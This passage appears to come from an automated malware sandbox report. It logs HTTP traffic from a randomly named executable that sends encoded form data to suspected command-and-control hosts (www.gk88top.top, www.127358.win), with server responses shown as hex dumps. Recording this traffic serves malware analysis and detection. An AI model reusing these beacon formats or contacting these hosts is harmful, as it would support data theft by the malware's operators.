                                                                    Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 54 33 2b 4d 6b 47 41 78 2b 50 69 46 48 73 34 37 37 67 67 58 42 78 41 76 31 2f 37 67 49 45 47 2b 6f 62 54 4d 75 77 58 78 50 47 51 67 79 54 75 65 4b 4c 74 33 2f 7a 7a 48 56 36 36 62 74 35 61 76 45 65 45 75 78 69 53 53 30 55 48 45 4a 70 4a 39 6b 66 4c 65 71 4e 47 36 70 62 4c 75 42 44 76 67 70 61 2f 44 44 55 4e 30 2b 50 67 35 6d 65 61 30 47 35 45 61 46 75 79 58 71 6a 54 4f 34 36 73 55 33 44 31 33 33 4c 73 6b 64 4b 69 55 37 46 2f 58 73 43 51 30 58 47 42 7a 39 47 4a 37 4a 61 67 46 32 6a 47 2b [TRUNCATED]
                                                                    Data Ascii: KxZ=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxnR/qR9Oiloi/dW5YoSpb7YxxErcWZHwfq/ALO2B5cs8Fh7oBRQmsPlFhEJza3hAZirwuqb9ZxnxONQV6BaVmuSUbZnTPZNLaUX8RaDrEBBlahCOdTyu5zW0LgCYidzVeT3+MkGAx+PiFHs477ggXBxAv1/7gIEG+obTMuwXxPGQgyTueKLt3/zzHV66bt5avEeEuxiSS0UHEJpJ9kfLeqNG6pbLuBDvgpa/DDUN0+Pg5mea0G5EaFuyXqjTO46sU3D133LskdKiU7F/XsCQ0XGBz9GJ7JagF2jG+/t2XbD8IxSsvDwaUgFb+EgV64OLQjIgesFT5bLIATd98TJyTmLn7LJpGrJj+x9w7kJXua6hIC6V0mt29v2/XLBZuxSOn04B/ESFFPVAb6EWkZVSXqBH2J636LgDbi05LjPGnuV2DZB61YHRbOWS0T3bpGiYq0T2r9p1FOzP9kHrE1J/5M0dt6WB778Rh0yXjtZwC5HXulmmWFWOaTqfITozJnsnPlVV0VoNTouH/e+uA7GjYElFNuO7VM10Rouzxj63Te2c+IIsfZfz8EcHlCj6cM5srEIeCn24Xm/Myt8eReV44t9bTiFD6rm983fWGTXWkoVXAd4Ld0jXeo6Nf1RD3AWXk9qFmaB6Aot5izkwTlVJVTLTOo2Z87H/xcvVz6R9s0anW2n3wgiHzhaGVNEWWJo7WJ4HNb+Vu7Zb5/Cl6LtWcsfScG0++0QqHqYpE/Zm2ZSxrsYINoXis0lAsIaywp21iPTdMHLSN0yDuOaDSRjT3SXH6I77GblXY9D8pfNFwyCYgT9ys+1kFXTOJcP+R45lNCKgizetufXJYnpPl98BMrgtlrtVm0QWX2itXCJggITUooC3JmXM/M5MqJQsHtq7yluCrBhy3T09CjA/NBrbAop2KA7Fa1fLatpA6zy3MkVu0F0Yu0zshZNpwclcIes82PBqDgY [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.649918104.21.7.187805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:05:54.727844000 CET591OUTGET /vjnn/?KxZ=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2C1TuTspqujhZjoi+NfkMLWXoMO10ul5nspQNZd1SB2qR4JUaa0=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:05:56.367559910 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:05:56 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfEY4MD7EiNSxpUccanJMTEy9vKgxk8JqK79xGUR5yRb92JEMa44UP1sjKcLUf3e2bMVLBPx4LdwJFOsKgFZ6Fkb3E2RoXOzZ%2BurN0k1tdkibbNboX4W%2FFD3FyxgdhHvDbc%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb1df2c834439c-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                                    Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
                                                                    Dec 6, 2024 10:05:56.367640018 CET656INData Raw: 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a
                                                                    Data Ascii: padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}
                                                                    Dec 6, 2024 10:05:56.905147076 CET1236INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                                    Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                                    Dec 6, 2024 10:05:56.905164003 CET224INData Raw: 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63 7a 54 6c 78 2f 5a 73 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a
                                                                    Data Ascii: DdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2
                                                                    Dec 6, 2024 10:05:56.905184984 CET1236INData Raw: 48 52 75 58 6e 30 41 49 59 57 64 75 35 2b 54 59 62 67 78 65 4e 2b 78 37 64 76 54 54 53 6a 48 48 77 43 50 69 58 67 34 4d 4c 45 77 55 6c 33 65 53 51 38 50 79 4c 52 7a 58 73 67 56 72 52 2f 75 75 58 76 7a 31 50 4c 4f 72 35 66 5a 2f 64 62 57 62 56 43
                                                                    Data Ascii: HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr5fZ/dbWbVCzCMhrkwWpBKIw13fRA+BxWO6D0BaArrBTakEQPh0wUICvsACE+gpbvOa6znkowE0AZntGEmNVUnJzFwIbvWEVVUWYEYC2Lu2dhz/xOCz30bqoExxwfdbS73jwnL1R1QMyAXbGRf3y8ChnANxXYsgYo2TTnZIQ2R0b
                                                                    Dec 6, 2024 10:05:56.905195951 CET1236INData Raw: 43 63 44 54 73 4a 4f 65 41 4d 44 4b 31 6e 4a 33 31 73 46 38 61 48 58 75 52 42 44 35 6c 47 4b 64 54 45 65 68 2b 56 36 62 45 37 31 65 49 35 4c 50 70 4f 55 4c 6f 43 7a 36 37 42 79 41 4a 77 72 36 75 53 79 49 2b 4d 72 51 74 37 56 65 75 6e 42 4d 61 73
                                                                    Data Ascii: CcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaV
                                                                    Dec 6, 2024 10:05:56.905214071 CET1236INData Raw: 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c 4b 74 59 6b 6c 34 61 37 4a 68 4f 77 53 43 41 2f 4d 4d 43 6c 79 4a 78 32 47 35 46 67 35 32 58 74 4e 4d 63 32 34 61 31 43 6f 6c 65 59 54 5a 44 2f 36 78 37 4d 6a 34 31 77 43 4d 74 32 58 73 70 65 4b
                                                                    Data Ascii: E0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+a
                                                                    Dec 6, 2024 10:05:56.905225992 CET672INData Raw: 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52 44 66 5a 6a 50 69 2f 6e 50 54 6b 34 39 62 7a 5a 49 41 44 46 74
                                                                    Data Ascii: qcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41B1juZqV1XPXi
                                                                    Dec 6, 2024 10:05:56.905239105 CET1236INData Raw: 74 72 57 62 66 6f 50 30 43 39 6b 68 67 6c 41 58 77 42 6e 37 64 6b 6d 5a 35 73 2b 4d 31 36 66 55 51 31 58 6b 74 35 41 59 61 45 4f 50 4e 39 73 36 59 78 4e 4b 51 55 2b 79 33 2b 64 35 72 67 44 69 30 39 63 79 49 42 4f 33 63 58 4f 72 65 77 6c 52 2f 39
                                                                    Data Ascii: trWbfoP0C9khglAXwBn7dkmZ5s+M16fUQ1Xkt5AYaEOPN9s6YxNKQU+y3+d5rgDi09cyIBO3cXOrewlR/9rMRj1jQ1G/STIM6kYAJ9CDmz+c32W57i7Zf10PZYu3dqvbOSPo1DSdyNU3O+4J84Ej1XgsIMt2OWQEq7DDuvdBsMuikzaFnvr2M4bH++ck2nJnafhhTfqBJU7OfN4TOmEnPS2PoImih7dHeEgy6GMALDRYNQfNBj1
                                                                    Dec 6, 2024 10:05:56.905360937 CET1236INData Raw: 6d 57 44 30 36 30 53 65 32 53 71 37 4b 39 52 7a 58 67 36 6f 4f 38 64 42 51 76 74 6b 53 77 71 39 6a 38 31 48 58 47 45 66 69 47 52 6d 51 78 73 74 42 4c 62 54 4a 4e 35 47 56 73 52 4b 53 49 39 2b 36 4f 48 54 67 68 63 59 79 41 73 6c 65 65 35 69 77 38
                                                                    Data Ascii: mWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee5iw8OEQCNIOwhChXB8/Z2ZkUA1xzt+9+NwagvZ4gdPgry4vkiAG1RhKrrAwSeO9uobGCofu2ByS1nbpiGQO+1IHqwpGGFF72Eq5Y6ELAw79hitijOqUwLpx1Wr3rh+wFsIwD3slO/OvjZT02OJFzujHyBciqOf7FWpVrn
                                                                    Dec 6, 2024 10:05:56.913495064 CET1236INData Raw: 47 2f 6b 42 47 7a 4c 7a 49 41 42 35 64 56 6d 56 67 33 33 6b 6e 2f 4a 64 39 69 4d 35 49 7a 72 31 31 4d 7a 38 36 2f 64 57 52 70 57 4c 50 45 78 68 54 64 2f 47 51 4c 66 7a 55 61 54 4a 73 68 56 5a 44 77 38 7a 46 77 55 49 6a 64 64 43 4d 4b 65 4b 77 6d
                                                                    Data Ascii: G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZU/LvwrBNrzUY9R8C2A/CFCgYUQF5Uyai3W83rNZw6JIta5cdvrgMJf1Xgwqp/kT4hUXGjkRV7XIQmuc78x37amexRp3FlpdhwAbkmwJZJbHVurOL


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.649939206.238.89.119805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:03.585201979 CET848OUTPOST /2mep/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.127358.win
                                                                    Referer: http://www.127358.win/2mep/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 44 6a 6e 6f 62 4d 75 69 6f 6c 36 49 4c 70 7a 32 4f 4d 66 30 49 4d 53 78 2b 65 6a 6a 74 4c 4e 72 56 35 2b 57 62 6f 51 36 39 41 72 4b 6d 70 63 44 4e 48 36 6e 2f 7a 4c 45 36 66 77 62 4a 70 71 61 75 30 6f 4c 69 54 51 37 50 46 73 7a 34 46 6e 45 4c 2b 43 75 31 2b 44 52 76 74 45 51 54 51 43 38 65 6b 39 55 41 53 73 4b 4d 66 6c 76 66 52 4e 75 4f 31 71 65 4a 66 39 75 61 6f 32 51 75 47 70 30 44 2b 59 71 58 75 72 49 4c 41 45 2b 4b 2b 2b 78 35 74 43 6a 2b 6c 4b 56 62 43 38 54 53 50 32 34 6d 4b 71 44 50 6b 6f 6f 6e 2b 5a 67 4d 7a 77 6f 34 57 32 75 50 49 31 32 6b 6b 43 6f 4a 57 39
                                                                    Data Ascii: KxZ=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCj+lKVbC8TSP24mKqDPkoon+ZgMzwo4W2uPI12kkCoJW9
                                                                    Dec 6, 2024 10:06:05.091571093 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:04 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.649947206.238.89.119805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:06.249603033 CET872OUTPOST /2mep/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.127358.win
                                                                    Referer: http://www.127358.win/2mep/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 76 4e 73 30 4a 2b 48 76 63 51 33 64 41 72 53 32 70 64 64 39 48 48 6e 2f 2f 31 45 37 6a 77 62 4e 4a 71 61 75 45 6f 4c 52 4c 66 34 2f 46 35 37 59 46 70 62 37 2b 43 75 31 2b 44 52 76 35 2b 51 58 38 43 38 75 55 39 57 68 53 6a 41 73 66 6d 73 66 52 4e 34 4f 31 75 65 4a 66 62 75 62 45 63 51 6f 4b 70 30 42 32 59 71 47 75 6f 43 4c 41 43 6a 36 2f 39 67 34 77 6e 76 76 59 4f 58 4a 71 6c 49 52 4c 49 35 51 58 77 66 38 6b 4c 36 33 65 62 67 4f 72 43 6f 59 57 63 73 50 77 31 6b 7a 6f 6c 6e 39 7a 65 74 2b 51 48 70 65 58 34 6c 55 4e 65 6f 4e 37 63 34 37 71 56 6d 51 3d 3d
                                                                    Data Ascii: KxZ=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63ebgOrCoYWcsPw1kzoln9zet+QHpeX4lUNeoN7c47qVmQ==
                                                                    Dec 6, 2024 10:06:07.739245892 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.649956206.238.89.119805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:08.909856081 CET1885OUTPOST /2mep/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.127358.win
                                                                    Referer: http://www.127358.win/2mep/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 6e 4e 73 47 42 2b 56 34 41 51 32 64 41 72 62 57 70 51 64 39 48 57 6e 2f 6e 78 45 37 75 46 62 4c 46 71 62 4e 4d 6f 44 41 4c 66 6a 50 46 35 33 34 46 6f 45 4c 2b 58 75 31 76 72 52 76 70 2b 51 58 38 43 38 73 4d 39 53 77 53 6a 47 73 66 6c 76 66 51 43 75 4f 31 47 65 4a 47 67 75 62 77 6d 54 59 71 70 78 52 6d 59 6c 55 32 6f 41 72 41 41 69 36 2f 66 67 34 38 30 76 76 45 6f 58 4e 71 62 49 54 58 49 31 68 4f 66 48 76 4d 41 73 52 4b 52 30 63 6e 64 75 4f 43 2b 31 4f 31 4c 73 6a 41 49 71 4f 33 65 6c 65 51 35 72 66 79 61 69 6d 70 31 32 4c 7a 4c 7a 62 2f 51 36 4a 38 54 64 70 38 78 4e 6f 39 55 43 71 69 51 67 51 48 68 38 6b 31 61 7a 77 70 36 43 34 43 76 66 44 57 64 67 35 72 5a 59 58 53 47 39 55 42 54 73 6a 33 6c 71 67 57 6c 59 36 33 77 72 50 2b 57 35 70 63 54 6a 74 50 43 4d 37 39 58 6f 65 4e 67 43 75 75 37 2f 56 6b 45 77 2f 2b 78 54 68 39 33 72 6f 56 36 68 56 32 58 4f 49 67 54 77 69 [TRUNCATED]
